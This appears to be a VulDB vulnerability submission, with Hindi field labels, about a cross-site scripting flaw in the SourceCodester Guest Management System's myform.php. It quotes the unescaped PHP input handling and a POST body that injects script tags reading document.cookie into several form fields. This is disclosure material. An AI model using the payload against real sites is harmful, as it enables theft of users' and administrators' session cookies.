| शीर्षक | Visitor management system CMS exist Cross-site scripting Vulnerability |
|---|
| विवरण | Visitor management system CMS exist Cross-site scripting Vulnerability .The input variables are not protected and output is directly output. Attackers can construct malicious code to steal user and administrator cookies.
Vulnerability file location:guestmanagement/myform.php
look at this source code
```
if(empty($_POST["name"]))
$name_error = "Enter the Name Properly !";
else
$name = $_POST["name"];
```
There is no protection for the name here. The `name` variable is directly output here. Here we can insert XSS statements to steal user cookies and other information. The construction statement is as follows
```
MeetingTo=<script>alert(document.cookie)&cno=1111111111&comment=<script>alert(document.cookie)&mydata=&name=<script>alert(document.cookie)</script>&purpose=<script>alert(document.cookie)&submit_post=Submit
```
https://s1.ax1x.com/2022/08/13/vtDEFO.png
Source link
https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html |
|---|
| स्रोत | ⚠️ https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html |
|---|
| उपयोगकर्ता | qidian (UID 30810) |
|---|
| सबमिशन | 13/08/2022 09:33 AM (4 साल पहले) |
|---|
| संयम | 14/08/2022 08:27 AM (23 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 206397 [SourceCodester Guest Management System myform.php नाम क्रॉस साइट स्क्रिप्टिंग] |
|---|
| अंक | 20 |
|---|